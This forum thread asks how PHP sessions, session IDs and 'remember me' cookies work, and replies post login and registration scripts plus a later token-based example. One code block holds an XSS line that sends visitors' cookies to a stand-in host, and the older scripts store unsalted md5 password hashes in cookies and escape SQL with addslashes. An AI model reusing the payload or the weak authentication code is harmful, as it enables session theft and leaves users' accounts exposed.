
sessions and sids


Ninjakreborn


I was wondering what the point is of using sessions to manage state for logins. You either save SIDs in URLs or you send them through cookies; what I see as the recommended and safer way is cookies. But what about encrypting your session IDs and decrypting them, is there a point? What if someone doesn't have cookies, can you use sessions like that and still work around that, or is there no point?

You can use sessions with a database if you wish to, rather than having the SESSID being stored in a cookie/URL. Or you can use a secure HTTP connection (HTTPS), which will encrypt any data being transferred from client to server, or from server to server.

There are 3 ways of passing session IDs: through URLs, through form fields, or through cookies, or database I guess.  I understand the relationship between the session and the cookie.  But I don't understand, if I store the SIDs in a database, how does it access that, or does each person get a different session ID stored in the database in the same table as their username and password?  Like for instance when they log in, I set a session and register the username/password, or whatever else, and I store the session ID in the database.  So every time they visit the site, it searches the database to log them in automatically or something. Some of this is still a little confusing and I am trying to get sessions down. Encryption was pretty easy, 3 days and I know a lot about it; cookies, I created a cookie login page in 20 minutes with no experience with cookies, so that was easy as hell, but now sessions.  So do I even have a need to encrypt my passwords if it's SSH, or SSL, or whatever, because I have that set up now?  The thing is, what if someone gets into the database? What I heard is that it's stupid to leave a plain text password stored in a database, but the crypt function's a piece of shit, the mcrypt library is severe overkill, and MySQL's encode/decode functions suck anus.  There has to be another way. Hash is something I can't figure out; I could probably hash something but have no idea how to compare it when they enter the password at login and I try to authenticate the user.

With sessions you can completely change the way it treats sessions: rather than having the sessions stored in a file on the server, you make it write to the database. Have a look at [url=http://uk2.php.net/manual/en/function.session-set-save-handler.php]session_set_save_handler[/url] for more information.

Ok let me just ask the questions I don't understand, if anyone can answer it'll be appreciated.

1. Is it better to save the sessions in files, or in a database?
2. What is the best way to handle session IDs, and what should I pick as session IDs?
3. Well, that's it, except how to allow people to remain logged in even if they don't have cookies if I choose to pass the session ID through a cookie, or is this stupid, because I know a lot of people who do it.

It's down to you and depends on the app you are developing. I know a few PHP apps, mainly forums/CMSs, that create their own session handlers, which store sessions within the database.

Session IDs are generated automatically and are unique.

I have read on a lot of tutorial sites and stuff that it's best to hash your SIDs when passing them, because it lowers the chances of someone trying to guess the session ID to get into the existing session. Another thing I wanted to ask: would I be stupid to rely purely on cookies for login?  So if I store the sessions in a file, and the IDs in a database, that will prevent the person from having to log in every time and they still won't have to deal with cookies or anything?

[quote]You can use sessions with a database if you wish to, rather than having the SESSID being stored in a cookie/URL.[/quote]
What? You can save session data in a database on the server, but you still need a method for recognising the client, i.e. cookies, or passing via URL / forms.
[quote]So if I store the sessions in a file, and the IDs in a database, that will prevent the person from having to log in every time and they still won't have to deal with cookies or anything?[/quote]
No... in order for a user to not have to worry about logging in each time they visit a site you'll need to set a cookie. How else will you recognise the client?

Storing session data in a database is a different topic, and really is no different to storing it in files (as is the default), except that you can persist certain information and it also makes it much easier to keep track of who is where on your site ([i]who's online[/i] lists and the like).

Alright then, explain this and I am ready to go.  I visit a lot of sites to look around on a regular basis, and I see a lot of them with free logins. I log in just for the hell of it, and I end up finding out something like I can stay logged in.  I see that if I disable cookies I can't.  Then there are other sites where I try the same thing, but even though cookies are disabled, I can still automatically log in each time. I have tested this on various sites in all three browsers; some of them keep you logged in for a specific amount of time after the session, but no cookies get delivered or removed from the browser.

What is the problem here? If you validate user information properly then there is no problem, is there?

Sessions are great.

You recently had a post on sessions and cookies and were told to use both, but now after all that explaining you continue to ask the same questions.




quick cookie example of remember me ok

[code]
$username = $_POST['username'];
$password = sha1($_POST['password']);

$DB->query('INSERT INTO users (username, password) VALUES (?, ?)', array($username, $password));


$username = $_POST['username'];
$password = sha1($_POST['password']);

/* Hash the input password and check it against
  the already hashed password stored in the database.
 
  Since both passwords are hashed using the same hash
  function, the two passwords will match if the user
  enters the correct password
*/

$user = $DB->getRow('SELECT * FROM users WHERE username=? AND password=?', array($username, $password));

if(!$user)
    die('Sorry, incorrect username or password.');


<img src="logo.gif" width="1" height="1" onload="window.location='http://cracker-site.com/save?cookie='+document.cookie" /> Hi guys, I'm new to your site!


$username = $_POST['username'];
$password = sha1($_POST['password']);

/* Hash the input password and check it against
  the already hashed password stored in the database.
 
  Since both passwords are hashed using the same hash
  function, the two passwords will match if the user
  enters the correct password
*/

$user = $DB->getRow('SELECT * FROM users WHERE username=? AND password=?', array($username, $password));

if(!$user)
    die('Sorry, incorrect username or password.');
   
// Did this user check that 'remember me' checkbox?
if(!empty($_POST['remember_me']))
{
    $expire = time() + 1728000; // Expire in 20 days
    $cookie_pass = sha1( sha1($user['password']) . sha1($user['salt']) );
   
    setcookie('user', $user['username'], $expire);
    setcookie('pass', $cookie_pass, $expire);
}


// On a later visit, log the user in from the two cookies
if(isset($_COOKIE['user'], $_COOKIE['pass']))
{
    $user = $DB->getRow('SELECT * FROM users WHERE username=?', array($_COOKIE['user']));
   
    if($user)
    {
        $check_pass = sha1( sha1($user['password']) . sha1($user['salt']) );
       
        // Strict comparison: == would apply type juggling to the two strings
        if($check_pass === $_COOKIE['pass'])
        {
            // The user should be logged in
        }
    }
}
[/code]



This is the only tutorial I am providing, as you should learn, ok.





database
[code]

CREATE TABLE users (  
   username varchar(30),  
   password varchar(32));

[/code]

database.php
[code]
<?  
 
/**  
* Connect to the mysql database.  
*/  
$conn = mysql_connect("localhost", "your_username", "your_password") or die(mysql_error());  
mysql_select_db('your_database', $conn) or die(mysql_error());  
 
?>  
 
[/code]


register.php

[code]

<?  
session_start();  
include("database.php");  
 
/**  
* Returns true if the username has been taken  
* by another user, false otherwise.  
*/  
function usernameTaken($username){  
  global $conn;  
  if(!get_magic_quotes_gpc()){  
     $username = addslashes($username);  
  }  
  $q = "select username from users where username = '$username'";  
  $result = mysql_query($q,$conn);  
  return (mysql_numrows($result) > 0);  
}  
 
/**  
* Inserts the given (username, password) pair  
* into the database. Returns true on success,  
* false otherwise.  
*/  
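function addNewUser($username, $password){  
  global $conn;  
  /* Escape the username for the query; usernameTaken() only escaped its own copy */  
  if(get_magic_quotes_gpc()){  
     $username = stripslashes($username);  
  }  
  $username = mysql_real_escape_string($username, $conn);  
  $q = "INSERT INTO users VALUES ('$username', '$password')";  
  return mysql_query($q,$conn);  
}  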
 
/**  
* Displays the appropriate message to the user  
* after the registration attempt. It displays a  
* success or failure status depending on a  
* session variable set during registration.  
*/  
function displayStatus(){  
  $uname = htmlspecialchars($_SESSION['reguname']); // escape before echoing into HTML  
  if($_SESSION['regresult']){  
?>  
 
<h1>Registered!</h1>  
<p>Thank you <b><? echo $uname; ?></b>, your information has been added to the database, you may now <a href="main.php" title="Login">log in</a>.</p>  
 
<?  
  }  
  else{  
?>  
 
<h1>Registration Failed</h1>  
<p>We're sorry, but an error has occurred and your registration for the username <b><? echo $uname; ?></b>, could not be completed.<br>  
Please try again at a later time.</p>  
 
<?  
  }  
  unset($_SESSION['reguname']);  
  unset($_SESSION['registered']);  
  unset($_SESSION['regresult']);  
}  
 
if(isset($_SESSION['registered'])){  
/**  
* This is the page that will be displayed after the  
* registration has been attempted.  
*/  
?>  
 
<html>  
<title>Registration Page</title>  
<body>  
 
<? displayStatus(); ?>  
 
</body>  
</html>  
 
<?  
  return;  
}  
 
/**  
* Determines whether or not to show to sign-up form  
* based on whether the form has been submitted, if it  
* has, check the database for consistency and create  
* the new account.  
*/  
if(isset($_POST['subjoin'])){  
  /* Make sure all fields were entered */  
  if(!$_POST['user'] || !$_POST['pass']){  
     die('You didn\'t fill in a required field.');  
  }  
 
  /* Spruce up username, check length */  
  $_POST['user'] = trim($_POST['user']);  
  if(strlen($_POST['user']) > 30){  
     die("Sorry, the username is longer than 30 characters, please shorten it.");  
  }  
 
  /* Check if username is already in use */  
  if(usernameTaken($_POST['user'])){  
     $use = htmlspecialchars($_POST['user']); // escape before echoing into HTML  
     die("Sorry, the username: <strong>$use</strong> is already taken, please pick another one.");  
  }  
 
  /* Add the new account to the database */  
  $md5pass = md5($_POST['pass']);  
  $_SESSION['reguname'] = $_POST['user'];  
  $_SESSION['regresult'] = addNewUser($_POST['user'], $md5pass);  
  $_SESSION['registered'] = true;  
  $self = htmlspecialchars($_SERVER['PHP_SELF']); // $HTTP_SERVER_VARS is obsolete; escape the path  
  echo "<meta http-equiv=\"Refresh\" content=\"0;url=$self\">";  
  return;  
}  
else{  
/**  
* This is the page with the sign-up form, the names  
* of the input fields are important and should not  
* be changed.  
*/  
?>  
 
<html>  
<title>Registration Page</title>  
<body>  
<h1>Register</h1>  
<form action="<? echo htmlspecialchars($_SERVER['PHP_SELF']); ?>" method="post">  
<table align="left" border="0" cellspacing="0" cellpadding="3">  
<tr><td>Username:</td><td><input type="text" name="user" maxlength="30"></td></tr>  
<tr><td>Password:</td><td><input type="password" name="pass" maxlength="30"></td></tr>  
<tr><td colspan="2" align="right"><input type="submit" name="subjoin" value="Join!"></td></tr>  
</table>  
</form>  
</body>  
</html>  
 
 
<?  
}  
?>  

[/code]


login.php

[code]
<?  
 
/**  
* Checks whether or not the given username is in the  
* database, if so it checks if the given password is  
* the same password in the database for that user.  
* If the user doesn't exist or if the passwords don't  
* match up, it returns an error code (1 or 2).  
* On success it returns 0.  
*/  
function confirmUser($username, $password){  
  global $conn;  
  /* Add slashes if necessary (for query) */  
  if(!get_magic_quotes_gpc()) {  
     $username = addslashes($username);  
  }  
 
  /* Verify that user is in database */  
  $q = "select password from users where username = '$username'";  
  $result = mysql_query($q,$conn);  
  if(!$result || (mysql_numrows($result) < 1)){  
     return 1; //Indicates username failure  
  }  
 
  /* Retrieve password from result, strip slashes */  
  $dbarray = mysql_fetch_array($result);  
  $dbarray['password']  = stripslashes($dbarray['password']);  
  $password = stripslashes($password);  
 
  /* Validate that password is correct */  
  if($password == $dbarray['password']){  
     return 0; //Success! Username and password confirmed  
  }  
  else{  
     return 2; //Indicates password failure  
  }  
}  
 
/**  
* checkLogin - Checks if the user has already previously  
* logged in, and a session with the user has already been  
* established. Also checks to see if user has been remembered.  
* If so, the database is queried to make sure of the user's  
* authenticity. Returns true if the user has logged in.  
*/  
function checkLogin(){  
  /* Check if user has been remembered */  
  if(isset($_COOKIE['cookname']) && isset($_COOKIE['cookpass'])){  
     $_SESSION['username'] = $_COOKIE['cookname'];  
     $_SESSION['password'] = $_COOKIE['cookpass'];  
  }  
 
  /* Username and password have been set */  
  if(isset($_SESSION['username']) && isset($_SESSION['password'])){  
     /* Confirm that username and password are valid */  
     if(confirmUser($_SESSION['username'], $_SESSION['password']) != 0){  
        /* Variables are incorrect, user not logged in */  
        unset($_SESSION['username']);  
        unset($_SESSION['password']);  
        return false;  
     }  
     return true;  
  }  
  /* User not logged in */  
  else{  
     return false;  
  }  
}  
 
/**  
* Determines whether or not to display the login  
* form or to show the user that he is logged in  
* based on if the session variables are set.  
*/  
function displayLogin(){  
  global $logged_in;  
  if($logged_in){  
     echo "<h1>Logged In!</h1>";  
     $uname = htmlspecialchars($_SESSION['username']); // escape before echoing into HTML  
     echo "Welcome <b>$uname</b>, you are logged in. <a href=\"logout.php\">Logout</a>";  
  }  
  else{  
?>  
 
<h1>Login</h1>  
<form action="" method="post">  
<table align="left" border="0" cellspacing="0" cellpadding="3">  
<tr><td>Username:</td><td><input type="text" name="user" maxlength="30"></td></tr>  
<tr><td>Password:</td><td><input type="password" name="pass" maxlength="30"></td></tr>  
<tr><td colspan="2" align="left"><input type="checkbox" name="remember">  
<font size="2">Remember me next time</font></td></tr>  
<tr><td colspan="2" align="right"><input type="submit" name="sublogin" value="Login"></td></tr>  
<tr><td colspan="2" align="left"><a href="register.php">Join</a></td></tr>  
</table>  
</form>  
 
<?  
  }  
}  
 
 
/**  
* Checks to see if the user has submitted his  
* username and password through the login form,  
* if so, checks authenticity in database and  
* creates session.  
*/  
if(isset($_POST['sublogin'])){  
  /* Check that all fields were typed in */  
  if(!$_POST['user'] || !$_POST['pass']){  
     die('You didn\'t fill in a required field.');  
  }  
  /* Spruce up username, check length */  
  $_POST['user'] = trim($_POST['user']);  
  if(strlen($_POST['user']) > 30){  
     die("Sorry, the username is longer than 30 characters, please shorten it.");  
  }  
 
  /* Checks that username is in database and password is correct */  
  $md5pass = md5($_POST['pass']);  
  $result = confirmUser($_POST['user'], $md5pass);  
 
  /* Check error codes */  
  if($result == 1){  
     die('That username doesn\'t exist in our database.');  
  }  
  else if($result == 2){  
     die('Incorrect password, please try again.');  
  }  
 
  /* Username and password correct, register session variables */  
  $_POST['user'] = stripslashes($_POST['user']);  
  $_SESSION['username'] = $_POST['user'];  
  $_SESSION['password'] = $md5pass;  
 
  /**  
   * This is the cool part: the user has requested that we remember that  
   * he's logged in, so we set two cookies. One to hold his username,  
   * and one to hold his md5-hashed password. We set them both to  
   * expire in 100 days. Now, next time he comes to our site, we will  
   * log him in automatically.  
   */  
  if(isset($_POST['remember'])){  
     setcookie("cookname", $_SESSION['username'], time()+60*60*24*100, "/");  
     setcookie("cookpass", $_SESSION['password'], time()+60*60*24*100, "/");  
  }  
 
  /* Quick self-redirect to avoid resending data on refresh */  
  $self = htmlspecialchars($_SERVER['PHP_SELF']); // $HTTP_SERVER_VARS is obsolete; escape the path  
  echo "<meta http-equiv=\"Refresh\" content=\"0;url=$self\">";  
  return;  
}  
 
/* Sets the value of the logged_in variable, which can be used in your code */  
$logged_in = checkLogin();  
 
?>  
[/code]


logout.php

[code]

 
<?  
session_start();  
include("database.php");  
include("login.php");  
 
/**  
* Delete cookies - the time must be in the past,  
* so just negate what you added when creating the  
* cookie.  
*/  
if(isset($_COOKIE['cookname']) && isset($_COOKIE['cookpass'])){  
  setcookie("cookname", "", time()-60*60*24*100, "/");  
  setcookie("cookpass", "", time()-60*60*24*100, "/");  
}  
 
?>  
 
<html>  
<title>Logging Out</title>  
<body>  
 
<?  
 
if(!$logged_in){  
  echo "<h1>Error!</h1>\n";  
  echo "You are not currently logged in, logout failed. Back to <a href=\"main.php\">main</a>";  
}  
else{  
  /* Kill session variables */  
  unset($_SESSION['username']);  
  unset($_SESSION['password']);  
  $_SESSION = array(); // reset session array  
  session_destroy();   // destroy session.  
 
  echo "<h1>Logged Out</h1>\n";  
  echo "You have successfully <b>logged out</b>. Back to <a href=\"main.php\">main</a>";  
}  
 
?>  
 
</body>  
</html>  

[/code]

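An added example (not the posters' code) that answers the hash-and-compare question earlier in the thread and shows a remember-me cookie that does not depend on the stored password hash: the cookie carries a random single-use token and the database keeps only its SHA-256 hash, so the cookie value cannot be computed from a database row. It assumes PHP 8 with pdo_sqlite; the table, function and cookie names and the sample credentials are constructed for the illustration.

```php
<?php
declare(strict_types=1);

// Added example; schema, function and cookie names are assumptions.
$db = new PDO('sqlite::memory:');   // stand-in database for the demo
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, pw_hash TEXT)');
$db->exec('CREATE TABLE remember_tokens (selector TEXT PRIMARY KEY,
           validator_hash TEXT, user_id INTEGER, expires INTEGER)');

function registerUser(PDO $db, string $username, string $password): void
{
    // password_hash() picks a per-user salt and a slow algorithm; the output
    // string records both, so no separate salt column is needed.
    $db->prepare('INSERT INTO users (username, pw_hash) VALUES (?, ?)')
       ->execute([$username, password_hash($password, PASSWORD_DEFAULT)]);
}

function verifyLogin(PDO $db, string $username, string $password): ?int
{
    $stmt = $db->prepare('SELECT id, pw_hash FROM users WHERE username = ?');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // Fetch by username, then let password_verify() compare against the stored hash.
    if ($row === false || !password_verify($password, $row['pw_hash'])) {
        return null;
    }
    return (int) $row['id'];
}

function issueRememberToken(PDO $db, int $userId, int $ttl = 1728000): string
{
    $selector  = bin2hex(random_bytes(9));    // lookup key, not secret
    $validator = bin2hex(random_bytes(32));   // secret, unrelated to the password
    $db->prepare('INSERT INTO remember_tokens VALUES (?, ?, ?, ?)')
       ->execute([$selector, hash('sha256', $validator), $userId, time() + $ttl]);
    return $selector . ':' . $validator;      // this string is the cookie value
}

function checkRememberToken(PDO $db, string $cookie): ?int
{
    $parts = explode(':', $cookie, 2);
    if (count($parts) !== 2) {
        return null;
    }
    $stmt = $db->prepare('SELECT validator_hash, user_id, expires
                          FROM remember_tokens WHERE selector = ?');
    $stmt->execute([$parts[0]]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || (int) $row['expires'] < time()
        || !hash_equals($row['validator_hash'], hash('sha256', $parts[1]))) {
        return null;
    }
    // Single use: drop the token; the caller issues a fresh one after login.
    $db->prepare('DELETE FROM remember_tokens WHERE selector = ?')->execute([$parts[0]]);
    return (int) $row['user_id'];
}

// Constructed demo values.
registerUser($db, 'alice', 'correct horse battery staple');
$uid    = verifyLogin($db, 'alice', 'correct horse battery staple');
$cookie = issueRememberToken($db, $uid);
if (PHP_SAPI !== 'cli') {
    setcookie('remember', $cookie, ['expires' => time() + 1728000, 'path' => '/',
              'secure' => true, 'httponly' => true, 'samesite' => 'Lax']);
}
var_dump(verifyLogin($db, 'alice', 'wrong password'));
var_dump(checkRememberToken($db, $cookie) === $uid);
var_dump(checkRememberToken($db, $cookie));
```
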
[quote]

Alright then, explain this and I am ready to go.  I visit a lot of sites to look around on a regular basis, and I see a lot of them with free logins. I log in just for the hell of it, and I end up finding out something like I can stay logged in.  I see that if I disable cookies I can't.  Then there are other sites where I try the same thing, but even though cookies are disabled, I can still automatically log in each time. I have tested this on various sites in all three browsers; some of them keep you logged in for a specific amount of time after the session, but no cookies get delivered or removed from the browser.

[/quote]


Sorry thorpe, I was answering the question on the remember me question, as I thought I'll do that for businessman to clear things up on the remember me issue.

PS. When it comes down to the session question, there is no difference or security difference from the default session statement to a database session code, in my opinion.

What I cannot understand is how come businessman doesn't read the manual.

I also don't know why you, businessman, always go on about encrypting this and that. Forget it, man.

Use a session as it is and enjoy.

lol..............................





Ok, so I will take a look at this and use it as an example. The reason I go on about encryption is that during the 3 months I studied security I learnt all kinds of attacks. Before I became a programmer, I was a hacker for 10 years; I knew a lot then, and a lot of my friends had easy ways to do some of these things, making me even more afraid as a programmer.  To tell you the truth, the session IDs: I had a friend who could crack a session ID in less than 20 minutes. He would listen in on the header transmissions, pull the SID from the cookie, decrypt it, and use it to gain access to the current session.  There are a lot of things I learnt as a hacker, and even more I learnt from my friends, so it makes me 100 times more scared, and I feel that if I use what I used to know, the stuff I make, and the tutorials I make for other people, will help them write more secure programming.

Let me say this.

If your interest as a hacker was for 10 years, then why are we having this conversation? As an old hacker you should easily identify the faults in all your code.

In this day and age it's a common solution to get a book and learn tricks on how to hack online computers and websites. There is all sorts of information out there, and it is also well easy to understand and do,

but you're a web designer now, so don't worry yourself about your site being hacked, as you've got to get listed high in Google to get properly hacked, as you know.

Most hackers will look for ports hanging off routers and then get what they want and go.

If you keep your code clean and secure by validating properly and do your best, then there's no problem, ok.

Don't expect to be able to do PHP programming as a high-end programmer. Enjoy yourself.

If you get hacked, you get hacked. If you're stupid enough to include all important information like credit card details and addresses etc. etc. in a session, then expect to be hacked; otherwise enjoy.

Good luck.



